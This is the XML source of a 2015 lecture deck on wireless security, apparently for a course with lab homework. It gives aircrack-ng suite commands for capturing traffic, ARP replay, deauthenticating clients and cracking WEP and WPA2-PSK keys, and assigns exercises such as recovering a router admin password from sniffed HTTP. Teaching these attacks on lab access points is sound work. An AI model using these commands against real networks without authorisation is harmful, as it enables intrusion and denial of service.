              <a:t>forcing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dictionary attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>WPA/2-PSK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only dictionary attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Need four-way handshake packets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3506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Cracking WEP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PTW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enhanced FMS method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only for ARP/IP packets </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Need key length + 3 bytes long key stream</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>22bytes known plaintext in ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> crack 40/104bit key</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>9bytes known plaintext in IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> crack 40bit keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>FMS/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>KoreK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FMS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Fluhrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mantin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Shamir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>): statistical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>KoreK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: statistical</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Brute force</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Certain IV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> guessing 1byte key 15% easier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>Many guesses (votes) determine highly-likely key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>then confirm this 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79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Cracking WEP key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Capture data packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>airodump-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –w &lt;capture-file&gt; mon0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enough packets, crack the capture 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Otherwise, ARP replay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/>
              <a:t>aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -3 –b &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; mon0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If NO Client?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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If OPEN authentication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fake authenticate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send ARP request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If Shared-key authentication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Collect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>keystream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (PRGA)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Do fake authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1314450" lvl="2" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>send ARP request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Crack captured file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err="1" smtClean="0"/>
              <a:t>aircrack-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  &lt;capture-file&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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46129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Dictionary Attack on WPA/2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Monitor and check clients connected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>airodump-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –c &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt; -d &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt; -w &lt;file&gt; mon0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Deauthenticate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aireplay-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -0 2 –a &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt; -c &lt;client&gt; mon0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>then handshake packets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Crack handshake</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aircrack-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –a 2 –b &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt; -w &lt;dictionary&gt; mon0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-a &lt;mode&gt;: mode 1 for WEP, 2 for WPA/2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77916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HW2-1: Given an AP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>WEP with Shared-key authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Crack the WEP key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.aircrack-ng.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>doku.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>how_to_crack_wep_with_no_clients</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HW2-2: Given an AP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>WPA2-PSK, with key “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One or more clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Crack the key using a dictionary containing “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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85166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Wireshark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It captures packets on specified interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Since 1998 (Ethereal)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Very very very very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>useful tool for understanding network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>text version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>very useful to automate packet capturing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tool for packet capture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>limited protocols support</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327806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Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: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www.wireshark.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Save packet capture to a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Import capture files created by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Displays packets with very detailed protocol information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Filter packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Create statistics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21296733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11F4D8BD-4807-1A4A-84AA-2E6BD040DF45}" type="slidenum">
              <a:rPr lang="en-US" sz="1400" b="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400" b="0">
              <a:latin typeface="Times New Roman" charset="0"/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Helvetica" charset="0"/>
              </a:rPr>
              <a:t>Wireshark System Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2150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981200"/>
            <a:ext cx="8153400" cy="3449638"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41823481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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New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Courier New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8A2DB6A-6753-CA4C-A158-EC48D14AEEC3}" type="slidenum">
              <a:rPr lang="en-US" sz="1400" b="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400" b="0">
              <a:latin typeface="Times New Roman" charset="0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Helvetica" charset="0"/>
              </a:rPr>
              <a:t>Wireshark Interface</a:t>
            </a:r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219200"/>
            <a:ext cx="8077200" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31914350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Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: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Show packets that meet certain condition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;protocol name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>udp.port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> == 53</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>UDP DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>udp.port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>== 53 || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp.port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = 53</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ip.addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>==10.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ip.srcport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ip.dstport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ip.port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ip.addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>==X &amp;&amp; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tcp.port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>==Y||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>udp.port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>==Z)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http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3710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HW1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Wireshark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Analyze http packet for router log-ins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Discover ID/password of the router admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Submit capture file and report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6347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12449</TotalTime>
  <Words>1637</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>304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Office Theme</vt:lpstr>
      <vt:lpstr>Wireless Security in Practice</vt:lpstr>
      <vt:lpstr>What do we need</vt:lpstr>
      <vt:lpstr>Wireshark</vt:lpstr>
      <vt:lpstr>Wireshark</vt:lpstr>
      <vt:lpstr>Wireshark: Features</vt:lpstr>
      <vt:lpstr>Wireshark System Overview</vt:lpstr>
      <vt:lpstr>Wireshark Interface</vt:lpstr>
      <vt:lpstr>Wireshark: filter</vt:lpstr>
      <vt:lpstr>HW1: Wireshark</vt:lpstr>
      <vt:lpstr>Demo: ICMP ping</vt:lpstr>
      <vt:lpstr>Monitor mode</vt:lpstr>
      <vt:lpstr>Monitor mode</vt:lpstr>
      <vt:lpstr>How to use monitor mode?</vt:lpstr>
      <vt:lpstr>Chipset &amp; Drivers</vt:lpstr>
      <vt:lpstr>Wireless Stacks</vt:lpstr>
      <vt:lpstr>Using wireless in Linux</vt:lpstr>
      <vt:lpstr>MAC filtering</vt:lpstr>
      <vt:lpstr>Getting ready for sniffing</vt:lpstr>
      <vt:lpstr>Scanning</vt:lpstr>
      <vt:lpstr>Airodump-ng</vt:lpstr>
      <vt:lpstr>SSID</vt:lpstr>
      <vt:lpstr>SSID</vt:lpstr>
      <vt:lpstr>When hidden SSID is exposed?</vt:lpstr>
      <vt:lpstr>aireplay-ng</vt:lpstr>
      <vt:lpstr>aireplay-ng</vt:lpstr>
      <vt:lpstr>Aircrack Suite</vt:lpstr>
      <vt:lpstr>DoS using deauthentication</vt:lpstr>
      <vt:lpstr>Extract password from the OS</vt:lpstr>
      <vt:lpstr>Steal WLAN Password in Windows</vt:lpstr>
      <vt:lpstr>Script in Windows</vt:lpstr>
      <vt:lpstr>Steal WLAN Password in Linux</vt:lpstr>
      <vt:lpstr>Aircrack-ng</vt:lpstr>
      <vt:lpstr>Cracking WEP Key</vt:lpstr>
      <vt:lpstr>Cracking WEP key</vt:lpstr>
      <vt:lpstr>Dictionary Attack on WPA/2</vt:lpstr>
      <vt:lpstr>HW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117</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-09-16T16:36:29Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-10-01T10:07:45Z</dcterms:modified>
</cp:coreProperties>
</file>